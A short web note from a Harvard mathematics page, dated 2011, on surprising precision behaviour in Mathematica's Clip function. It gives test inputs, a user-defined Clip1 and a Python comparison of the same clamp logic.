12-01-2011: A google group discussed some strange behavior of the Mathematica function Clip. Run this and you will see. I defined my own function Clip1 to illustrate it
Clip[1.00000000000000036]
Clip[1.000000000000000360000]
Clip1[x_]:=Sign[x]*Min[Abs[x],1]
Clip1[1.00000000000000036]
Clip1[0.9999999999999966]
Clip1[0.9999999999999966000]
There are confusing things going on in Mathematica with respect to accuracy. In the second-to-last example, the result should be rendered in at least the same accuracy. All involved functions Sign, Min and Abs should be implemented in arbitrary accuracy; they only refer to order and sign.
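For comparison, the same clamp logic in Python with ordinary machine doubles behaves as expected; this sketch cannot reproduce Mathematica's arbitrary-precision quirks, it only shows the intended mathematics of Clip1:

```python
import math

def clip1(x, limit=1.0):
    """Clamp x to [-limit, limit]; mirrors Clip1[x_] := Sign[x]*Min[Abs[x], 1]."""
    return math.copysign(min(abs(x), limit), x)

print(clip1(1.00000000000000036))  # just above 1 as a double -> 1.0
print(clip1(0.9999999999999966))   # inside the interval, returned unchanged
print(clip1(-2.5))                 # -> -1.0
```

Here 1.00000000000000036 rounds up to the nearest representable double above 1, so it gets clipped; in Mathematica the surprise is in how the precision of the input propagates to the output.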

Oliver Knill, Department of Mathematics, Harvard University, One Oxford Street, Cambridge, MA 02138, USA. SciCenter 432 Tel: (617) 495 5549, Email: knill@math.harvard.edu Twitter, Youtube, Vimeo, Linkedin, Scholar Harvard, Academia, Google plus, Google Scholar, Ello, Webcam, Fall 2017 office hours: Mon-Fri 4-5 PM and by appointment.